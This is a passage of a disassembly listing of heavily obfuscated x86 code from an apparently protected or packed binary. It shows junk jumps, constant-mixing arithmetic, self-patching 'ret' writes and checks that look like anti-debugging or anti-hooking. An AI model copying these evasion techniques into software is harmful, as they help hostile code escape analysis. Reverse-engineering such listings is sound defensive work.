		jnz	loc_443401
		jmp	loc_450C44
; END OF FUNCTION CHUNK	FOR sub_440337
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4448E2

loc_44CAEC:				; CODE XREF: sub_4448E2:loc_452D5Aj
		add	eax, 12411686h
		mov	edx, [esp+14h+var_14]
		push	offset sub_457AE8
		jmp	loc_455E75
; END OF FUNCTION CHUNK	FOR sub_4448E2
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_95. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4458DD

loc_44CB00:				; CODE XREF: sub_4458DD+D926j
		add	eax, 8EF6BEB5h
		push	ebx
		push	6616F5Fh
		pop	ebx

loc_44CB0D:				; CODE XREF: sub_44AFF6:loc_44A40Aj
		add	ebx, 3AC5F613h
		jmp	loc_44D2FD
; END OF FUNCTION CHUNK	FOR sub_4458DD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44B508

loc_44CB18:				; CODE XREF: sub_44B508+CB3Fj
		add	ecx, esi
		xor	eax, edx
		test	esi, edi
		jmp	loc_44C1AD
; END OF FUNCTION CHUNK	FOR sub_44B508
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_44CB23:				; CODE XREF: sub_445226:loc_4500EEj
		push	0DF81528Eh
		pop	eax
		rol	eax, 9
		xor	eax, 0A255109Bh
		add	eax, ebp
		push	ebx
		push	2C144387h
		jmp	loc_44DDE4
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453867

loc_44CB3F:				; CODE XREF: sub_453867:loc_43EA81j
		push	edx
		push	659867FFh
		pop	edx
		sub	edx, 17611Eh
		jmp	loc_43CD5F
; END OF FUNCTION CHUNK	FOR sub_453867

; =============== S U B	R O U T	I N E =======================================



sub_44CB51	proc near		; CODE XREF: y2kk37jd:00449D1Bp
					; y2kk37jd:00452B8Dj

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 00445C2B SIZE 00000005 BYTES

		xchg	eax, [esp+0]
		pop	eax
		xchg	ecx, [esp-4+arg_0]
		jmp	loc_445C2B
sub_44CB51	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_44CB5D:				; CODE XREF: sub_445226+10E3Cj
		pop	edx
		sub	edx, 347D7A99h
		xor	edx, ds:4000F2h
		or	edx, 4D078E39h
		xor	edx, 8F3DDEDBh
		jmp	loc_44AC57
; END OF FUNCTION CHUNK	FOR sub_445226

; =============== S U B	R O U T	I N E =======================================



sub_44CB7B	proc near		; CODE XREF: y2kk37jd:004510B4j
					; y2kk37jd:00457B1Cp
		xchg	edx, [esp+0]
		pop	edx
		setnz	byte ptr [ebp-1]
sub_44CB7B	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_455DDE

loc_44CB83:				; CODE XREF: sub_44E648-1112Bj
					; sub_44E648-263Aj ...
		mov	al, [ebp-1]
		jmp	loc_44C35F
; END OF FUNCTION CHUNK	FOR sub_455DDE

; =============== S U B	R O U T	I N E =======================================



sub_44CB8B	proc near		; DATA XREF: sub_44D302-1FA8o

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0044F39E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453D2C SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0045A8C2 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0045AF7D SIZE 00000006 BYTES

		call	sub_442C3E
		mov	ds:off_41E150, eax
		lea	eax, loc_45A8C2
		mov	byte ptr [eax],	0C3h
		jmp	loc_45A8C2
sub_44CB8B	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_44CBA4	proc near		; CODE XREF: sub_406424+77p
					; sub_4064D4+52p ...
		call	sub_454539
		jmp	ds:off_41E154
sub_44CBA4	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43EF4F

loc_44CBAF:				; CODE XREF: sub_43EF4F+CC61j
					; sub_451A35+5DAAj
		jmp	loc_45C564
; END OF FUNCTION CHUNK	FOR sub_43EF4F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4406A2

loc_44CBB4:				; CODE XREF: sub_4406A2+Bj
		jmp	nullsub_520
; END OF FUNCTION CHUNK	FOR sub_4406A2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F911

loc_44CBB9:				; CODE XREF: sub_43F911:loc_43E004j
		and	ecx, ebx
		pop	ebx
		mov	al, 1
		shl	al, cl
		mov	edx, [ebp-14h]
		jmp	loc_45067F
; END OF FUNCTION CHUNK	FOR sub_43F911
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4458DD

loc_44CBC8:				; CODE XREF: sub_4458DD:loc_448ADDj
		or	esi, 71876AE0h
		shl	esi, 15h
		jnb	loc_44E019
		jmp	loc_452F6E
; END OF FUNCTION CHUNK	FOR sub_4458DD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F911

loc_44CBDC:				; CODE XREF: sub_43F911+1A36Bj
		push	0A60340C6h

loc_44CBE1:				; CODE XREF: sub_43F911:loc_43BD22j
		push	55AF781Dh
		pop	eax
		sub	eax, 0B5F732FCh
		rol	eax, 16h
		xor	eax, ds:4000EEh
		sub	eax, 41CF1199h
		jmp	loc_447295
; END OF FUNCTION CHUNK	FOR sub_43F911
; ---------------------------------------------------------------------------

loc_44CC01:				; CODE XREF: y2kk37jd:0044774Dj
		pop	edx

; =============== S U B	R O U T	I N E =======================================



sub_44CC02	proc near		; CODE XREF: sub_446718+C523p

arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043B866 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044CF22 SIZE 0000000F BYTES

		xchg	esi, [esp+0]
		pop	esi

loc_44CC06:				; CODE XREF: sub_43CA5B:loc_447E58j
		lea	eax, loc_44CF22
		mov	byte ptr [eax],	0C3h
		jmp	loc_43B866
sub_44CC02	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BD20

loc_44CC14:				; CODE XREF: sub_44BD20+5j
		mov	eax, [esp+0]
		push	edx
		call	sub_44461D
		jmp	loc_443290
; END OF FUNCTION CHUNK	FOR sub_44BD20
; ---------------------------------------------------------------------------

loc_44CC22:				; CODE XREF: y2kk37jd:loc_447D4Bj
		pop	edx
		mov	eax, [esp]
		push	edi
		mov	edi, edx
		xchg	edi, [esp]
		jmp	loc_45212E

; =============== S U B	R O U T	I N E =======================================



sub_44CC31	proc near		; CODE XREF: y2kk37jd:0043BDABj
					; sub_44346B+17E61p

var_8		= dword	ptr -8
arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0044045E SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00441135 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004435A6 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00444791 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00445AE1 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0044AED0 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044CF56 SIZE 00000028 BYTES
; FUNCTION CHUNK AT 00456AB2 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00456B7D SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0045891C SIZE 00000005 BYTES

		xchg	edi, [esp+0]
		pop	edi
		push	0CE0CDFF1h
		pop	ecx
		and	ecx, 0CB0BB4EAh
		cmp	ecx, 59DF0AADh
		jmp	loc_44045E
sub_44CC31	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_44CC4C:				; CODE XREF: y2kk37jd:00446519j
		and	edi, 99AAB20h
		add	edi, 0FFC297CBh
		xchg	edi, [esp]
		jmp	sub_44AD49
; ---------------------------------------------------------------------------

loc_44CC60:				; DATA XREF: y2kk37jd:00444E4Do
		lea	eax, loc_458655
		mov	byte ptr [eax],	0C3h
		jmp	loc_458655
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454433

loc_44CC6E:				; CODE XREF: sub_454433+4223j
		mov	eax, [esp+0]
		push	edx
		call	sub_445BB5
		mov	eax, 0CAAB96A5h
		call	sub_44113A
		jmp	loc_43CDE6
; END OF FUNCTION CHUNK	FOR sub_454433
; ---------------------------------------------------------------------------
		mov	[eax], ecx
		jmp	sub_4412BF
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_164. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43E07B

loc_44CC8E:				; CODE XREF: sub_43E07B+D3CEj
		rol	esi, 0Ch
		xor	esi, 39E56447h
		rol	esi, 5
		jnb	loc_43E20E

loc_44CCA0:				; CODE XREF: sub_444000+184EFj
		jmp	loc_458318
; END OF FUNCTION CHUNK	FOR sub_43E07B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43BD0D

loc_44CCA5:				; CODE XREF: sub_43BD0D+10j
		jmp	loc_43D868
; END OF FUNCTION CHUNK	FOR sub_43BD0D
; ---------------------------------------------------------------------------
		js	loc_447430
		jmp	loc_43E20C
; ---------------------------------------------------------------------------

loc_44CCB5:				; DATA XREF: y2kk37jd:0043CFA6o
		mov	byte ptr [eax],	0C3h
		jmp	sub_444899
; ---------------------------------------------------------------------------
		push	edi
		push	5A47DCBh
		pop	edi
		or	edi, ds:4000E8h

loc_44CCCA:				; CODE XREF: y2kk37jd:loc_446060j
		add	edi, 589D4357h
		xchg	edi, [esp]
		jmp	loc_442983
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444D6F

loc_44CCD8:				; CODE XREF: sub_444D6F:loc_444D7Bj
		pop	ebx
		rol	ebx, 3
		cmp	ebx, 0D75F82A5h
		jmp	loc_44AD91
; END OF FUNCTION CHUNK	FOR sub_444D6F

; =============== S U B	R O U T	I N E =======================================



sub_44CCE7	proc near		; DATA XREF: y2kk37jd:00457256o

; FUNCTION CHUNK AT 00440D37 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00447A8F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004578B5 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0045A09B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045AF14 SIZE 00000011 BYTES

		push	5CBBE66Eh
		pop	ebx
		rol	ebx, 9
		or	ebx, 104A73D5h
		jmp	loc_45A09B
sub_44CCE7	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4411C3

loc_44CCFB:				; CODE XREF: sub_4411C3:loc_44B9E4j
		rol	eax, 17h
		add	eax, 0D516B40Bh
		mov	eax, [eax]
		or	eax, eax
		jnz	loc_45BD7A
		jmp	loc_446778
; END OF FUNCTION CHUNK	FOR sub_4411C3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4448E2

loc_44CD13:				; CODE XREF: sub_4448E2:loc_4428C5j
					; sub_4448E2+69A9j
		lea	eax, [ebp-2BBh]
		cmp	dword ptr [eax], 47424454h
		jz	loc_44D915
		jmp	loc_44499D
; END OF FUNCTION CHUNK	FOR sub_4448E2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CDD5

loc_44CD2A:				; CODE XREF: sub_44CDD5+5849j
		add	ebx, esi
		jl	loc_45A1CE
; END OF FUNCTION CHUNK	FOR sub_44CDD5
; START	OF FUNCTION CHUNK FOR sub_448700

loc_44CD32:				; CODE XREF: sub_44CDD5:loc_43F226j
					; sub_448700-59CEj ...
		jmp	loc_4562F5
; ---------------------------------------------------------------------------

loc_44CD37:				; CODE XREF: sub_44CDD5-F140j
					; sub_448700+Dj
		pop	ecx
		xchg	edx, [esp-4+arg_0]
		mov	ebp, edx
		jmp	loc_44CA3C
; END OF FUNCTION CHUNK	FOR sub_448700
; ---------------------------------------------------------------------------

loc_44CD42:				; CODE XREF: y2kk37jd:00456152j
		jb	loc_441606

; =============== S U B	R O U T	I N E =======================================



sub_44CD48	proc near		; CODE XREF: sub_445226:loc_44E2F5p

; FUNCTION CHUNK AT 00446106 SIZE 00000007 BYTES

		xchg	eax, [esp+0]
		pop	eax
		add	ecx, 0DD1CFD8Eh
		jmp	loc_446106
sub_44CD48	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_44CD57:				; CODE XREF: y2kk37jd:0045059Cj
		jz	loc_458D31
		jmp	loc_43D948
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F75D

loc_44CD62:				; CODE XREF: sub_43F75D+2381j
		jz	loc_4440CC
		jmp	loc_44EA8C
; END OF FUNCTION CHUNK	FOR sub_43F75D
; ---------------------------------------------------------------------------

loc_44CD6D:				; CODE XREF: y2kk37jd:00446961j
		or	edx, ds:4000EAh
		add	edx, 57074CA1h
		xor	edx, 5EEDC462h
		xor	eax, edx
		pop	edx
		rol	eax, 1Fh
		jmp	loc_4485A8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B7AA

loc_44CD8A:				; CODE XREF: sub_45B7AA-1FF93j
					; sub_45B7AA:loc_45B801j
		mov	eax, [ebp-4]
		mov	eax, [eax]
		and	eax, 0FFFFFFh
		cmp	eax, 0C3C033h
		jnz	loc_458921
		jmp	loc_44D354
; END OF FUNCTION CHUNK	FOR sub_45B7AA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C851

loc_44CDA4:				; CODE XREF: sub_43C851+FBDFj
		xchg	esi, eax
		jmp	loc_43BC79
; END OF FUNCTION CHUNK	FOR sub_43C851
; ---------------------------------------------------------------------------
		and	edi, esi
		popf

loc_44CDAE:				; CODE XREF: y2kk37jd:loc_445B7Ej
		jmp	sub_4548FB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454B16

loc_44CDB3:				; CODE XREF: sub_454B16:loc_45C35Ej
		jz	loc_4429F9
		jmp	loc_459776
; END OF FUNCTION CHUNK	FOR sub_454B16
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_443525

loc_44CDBE:				; CODE XREF: sub_443525:loc_453EB4j
		jl	loc_43EFD6

loc_44CDC4:				; CODE XREF: sub_44610D+CE6Cj
		jmp	loc_454D02
; END OF FUNCTION CHUNK	FOR sub_443525
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455DDE

loc_44CDC9:				; CODE XREF: sub_455DDE:loc_4422E1j
		jmp	loc_459971
; END OF FUNCTION CHUNK	FOR sub_455DDE
; ---------------------------------------------------------------------------
		test	eax, ebp
		jmp	loc_441CF3

; =============== S U B	R O U T	I N E =======================================



sub_44CDD5	proc near		; CODE XREF: sub_44C2AE+A103p
					; y2kk37jd:0045B510j

; FUNCTION CHUNK AT 0043BADA SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043C40F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043CD91 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043DC83 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0043F226 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043F23B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043FB1D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00442B9D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00442D37 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 004445FF SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00446911 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004469C9 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00447348 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448033 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044B895 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044B9F9 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0044C6FE SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044CD2A SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044F447 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0044F660 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044FA44 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 0044FB82 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00452615 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00453A87 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004572D6 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00458039 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00458CDD SIZE 00000007 BYTES
; FUNCTION CHUNK AT 00459BA9 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 0045AF25 SIZE 00000012 BYTES

		xchg	edx, [esp+0]
		pop	edx
		mov	ebp, esp
		push	ecx
		mov	[ebp-4], eax
		mov	eax, [ebp-4]
		mov	al, [eax]
		jnz	loc_442D37
		jmp	loc_44F660
sub_44CDD5	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D5C1

loc_44CDEF:				; CODE XREF: sub_43D5C1+Dj
		mov	dword ptr [eax], 737361h
		push	0
		lea	eax, [ebp-20h]
		push	eax
		call	sub_4460D0
		push	edx
		jmp	loc_43F4A3
; END OF FUNCTION CHUNK	FOR sub_43D5C1

; =============== S U B	R O U T	I N E =======================================



sub_44CE06	proc near		; CODE XREF: sub_451711:loc_44304Aj

var_4		= dword	ptr -4

		push	ebp
		mov	ebp, edx
		xchg	ebp, [esp+4+var_4]
		call	sub_4553C1
		mov	eax, 0D504D785h
		jmp	sub_453093
sub_44CE06	endp

; [00000001 BYTES: COLLAPSED FUNCTION nullsub_514. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------

locret_44CE1C:				; CODE XREF: y2kk37jd:004400B6j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455C79

loc_44CE1D:				; CODE XREF: sub_455C79+Ej
		jmp	loc_45769B
; END OF FUNCTION CHUNK	FOR sub_455C79
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4531A2

loc_44CE22:				; CODE XREF: sub_4531A2+Ej
		jmp	loc_44E6F0
; END OF FUNCTION CHUNK	FOR sub_4531A2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F346

loc_44CE27:				; CODE XREF: sub_43F346:loc_442824j
		jz	loc_444A8C
		jmp	loc_45518A
; END OF FUNCTION CHUNK	FOR sub_43F346
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455E0B

loc_44CE32:				; CODE XREF: sub_455E0B:loc_459517j
		jz	loc_43DFCF
		jmp	loc_451A4B
; END OF FUNCTION CHUNK	FOR sub_455E0B
; ---------------------------------------------------------------------------
		test	eax, edi
		jmp	loc_44E3B2
; ---------------------------------------------------------------------------

locret_44CE44:				; CODE XREF: y2kk37jd:00448DB9j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4567FD

loc_44CE45:				; CODE XREF: sub_4567FD-76C0j
		jmp	loc_4508B6
; END OF FUNCTION CHUNK	FOR sub_4567FD
; ---------------------------------------------------------------------------

loc_44CE4A:				; CODE XREF: y2kk37jd:0043D63Ej
		jmp	loc_4503A7
; ---------------------------------------------------------------------------
		db 9Dh
		dd 8710C5C1h, 0F68A0F11h, 0E9000066h, 0FFFF805Ch
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43F8B8

loc_44CE60:				; CODE XREF: sub_43F8B8:loc_4533FBj
		xchg	ebx, [esp+8+var_8]
		mov	esi, ebx
		pop	ebx
		or	esi, 7B9D59E3h
		jmp	loc_44C7CB
; END OF FUNCTION CHUNK	FOR sub_43F8B8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45922C

loc_44CE71:				; CODE XREF: sub_45922C-A4FFj
		jl	loc_451399
		ror	ebx, 17h
		add	ebp, esi

loc_44CE7C:				; CODE XREF: sub_45922C+1773j
		rol	eax, 0Dh
		cmp	eax, 8A52F025h
		jmp	loc_44655C
; END OF FUNCTION CHUNK	FOR sub_45922C
; ---------------------------------------------------------------------------
		pop	eax
		jmp	sub_447F67
; ---------------------------------------------------------------------------
		sbb	ecx, 292D371Ah
		jmp	sub_448718
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4440AB

loc_44CE9B:				; CODE XREF: sub_4440AB+6DB2j
		adc	eax, ebx
		jno	loc_44B537
		cmp	ebp, edx
		jmp	loc_456FD4
; END OF FUNCTION CHUNK	FOR sub_4440AB
; ---------------------------------------------------------------------------

loc_44CEAA:				; CODE XREF: y2kk37jd:0044BD6Cj
		pop	eax

; =============== S U B	R O U T	I N E =======================================



sub_44CEAB	proc near		; CODE XREF: sub_44CEAB-11DBBp

var_4		= dword	ptr -4
arg_0		= dword	ptr  4

; FUNCTION CHUNK AT 0043B0E7 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0043DD23 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0043E48B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00441845 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00444738 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 00445629 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00448621 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0044A456 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044E100 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 004528D4 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00452BCF SIZE 00000009 BYTES
; FUNCTION CHUNK AT 00455095 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00456DE1 SIZE 00000005 BYTES

		xchg	ebx, [esp+4+var_4]
		pop	ebx
		jnz	loc_444738
		add	eax, [esp+0]
		adc	edx, [esp+arg_0]
		add	esp, 8
		mov	eax, [eax]
		jmp	loc_4528D4
sub_44CEAB	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45380A

loc_44CEC6:				; CODE XREF: sub_45380A:loc_45882Aj
		jz	loc_441D73
		jmp	loc_453D3A
; END OF FUNCTION CHUNK	FOR sub_45380A
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445226

loc_44CED1:				; CODE XREF: sub_445226:loc_441FEDj
		ror	ebp, 6
		adc	ecx, edx
		jmp	loc_452D1D
; END OF FUNCTION CHUNK	FOR sub_445226
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_458FCE

loc_44CEDB:				; CODE XREF: sub_458FCE+19j
		jge	loc_45BBD2

loc_44CEE1:				; CODE XREF: sub_43F346+ACC6j
		jmp	loc_4482C9
; END OF FUNCTION CHUNK	FOR sub_458FCE
; ---------------------------------------------------------------------------
		xor	eax, ebx
		cmp	ecx, ebp
		jmp	loc_45BBC6
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44F60F

loc_44CEEF:				; CODE XREF: sub_44F60F:loc_441F26j
		add	eax, 3738B4F7h
		xchg	eax, [esp+4+var_4]
		jmp	sub_442C3E
; END OF FUNCTION CHUNK	FOR sub_44F60F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44EE3D

loc_44CEFD:				; CODE XREF: sub_44EE3D:loc_455984j
		push	75E2AE5Dh
		mov	ecx, edi
		jmp	loc_45040A
; END OF FUNCTION CHUNK	FOR sub_44EE3D

; =============== S U B	R O U T	I N E =======================================



sub_44CF09	proc near		; CODE XREF: sub_443AA7:loc_443AADp
					; y2kk37jd:004471F1j

; FUNCTION CHUNK AT 0043C826 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043EB48 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00441B2D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00441FA1 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004490F0 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0044C780 SIZE 0000001E BYTES
; FUNCTION CHUNK AT 0044DF2D SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044E04A SIZE 00000015 BYTES
; FUNCTION CHUNK AT 00450127 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00454268 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00455BDC SIZE 00000008 BYTES

		xchg	edi, [esp+0]
		pop	edi
		mov	edx, [ebp-4]
		imul	byte ptr [edx]
		jmp	loc_44DF2D
sub_44CF09	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
		jmp	ds:off_41E0F8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44AC89

loc_44CF1D:				; CODE XREF: sub_44AC89-6703j
		jmp	loc_45975F
; END OF FUNCTION CHUNK	FOR sub_44AC89
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CC02

loc_44CF22:				; CODE XREF: sub_44CC02:loc_43B866j
					; sub_444A65:loc_44660Cj ...
		xchg	esi, [esp-4+arg_0]
		mov	edx, esi
		call	sub_44BD20

loc_44CF2C:				; CODE XREF: sub_443ECB+169BBj
		jmp	nullsub_71
; END OF FUNCTION CHUNK	FOR sub_44CC02
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_457FDC

loc_44CF31:				; CODE XREF: sub_457FDC-AC5Fj
		jmp	nullsub_232
; END OF FUNCTION CHUNK	FOR sub_457FDC
; ---------------------------------------------------------------------------

loc_44CF36:				; CODE XREF: y2kk37jd:00458B6Fj
		xor	eax, ecx

; =============== S U B	R O U T	I N E =======================================



sub_44CF38	proc near		; CODE XREF: sub_45BC07+5p

; FUNCTION CHUNK AT 00442128 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044392E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00447BF0 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0044AE9A SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044C8F9 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044E27B SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044F033 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004512CB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00451A0C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453F9F SIZE 00000002 BYTES
; FUNCTION CHUNK AT 00454206 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045690D SIZE 0000000F BYTES
; FUNCTION CHUNK AT 0045792C SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0045A2D3 SIZE 00000005 BYTES

		xchg	ebx, [esp+0]
		pop	ebx
		test	al, al
		jz	loc_447BF0
		jmp	loc_44F033
sub_44CF38	endp ; sp-analysis failed

; ---------------------------------------------------------------------------

loc_44CF49:				; CODE XREF: y2kk37jd:00445109j
		xor	edi, ebx
		xor	esi, 20E8EF28h
		jmp	loc_446AEC
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CC31

loc_44CF56:				; CODE XREF: y2kk37jd:00447649j
					; sub_44CC31:loc_45891Cj
		jbe	loc_456AB2

loc_44CF5C:				; CODE XREF: y2kk37jd:loc_440867j
		sub	eax, 9E9EE465h
		add	eax, 0E2C2184Dh
		call	sub_44113A
		mov	ds:off_41E014, eax
		lea	eax, sub_445C40
		jmp	loc_444791
; END OF FUNCTION CHUNK	FOR sub_44CC31
; ---------------------------------------------------------------------------

loc_44CF7E:				; CODE XREF: y2kk37jd:loc_442876j
		or	ebx, 0E080C071h
		sub	ebx, 8F5FF93Ah
		add	ebx, 99E8062Dh
		xchg	ebx, [esp]
		jmp	sub_442C3E
; ---------------------------------------------------------------------------

loc_44CF98:				; DATA XREF: sub_44113A+7AA0o
		add	eax, 4EAE6D76h
		mov	eax, [eax]
		cmp	dword ptr [eax+4], 0
		ja	loc_453FA1
		jmp	loc_43F6B5
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_473. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4595D8

loc_44CFB0:				; CODE XREF: sub_4595D8+93Fj
		jmp	nullsub_302
; END OF FUNCTION CHUNK	FOR sub_4595D8
; ---------------------------------------------------------------------------

loc_44CFB5:				; CODE XREF: y2kk37jd:00452139j
		jl	loc_4543B3
; START	OF FUNCTION CHUNK FOR sub_44B03F

loc_44CFBB:				; CODE XREF: sub_44B03F:loc_452128j
		xor	eax, 0EADAE8B0h
		add	eax, ebp
		add	eax, 9312BD74h
		jmp	loc_43DA97
; END OF FUNCTION CHUNK	FOR sub_44B03F
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440FC9

loc_44CFCE:				; CODE XREF: sub_440FC9+A20Fj
		xor	ebp, 5E420CAh
		jmp	loc_43DCA0
; END OF FUNCTION CHUNK	FOR sub_440FC9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441F5E

loc_44CFD9:				; CODE XREF: sub_441F5E+17585j
		jnp	loc_442C6A
		push	33F75235h
		sub	esi, edx

loc_44CFE6:				; CODE XREF: sub_441F5E:loc_450B83j
		push	offset loc_4487C8
		jmp	nullsub_441
; END OF FUNCTION CHUNK	FOR sub_441F5E
; ---------------------------------------------------------------------------

loc_44CFF0:				; DATA XREF: sub_449775-2058o
		add	ebx, 4A9B17BEh
		add	ebx, ebp
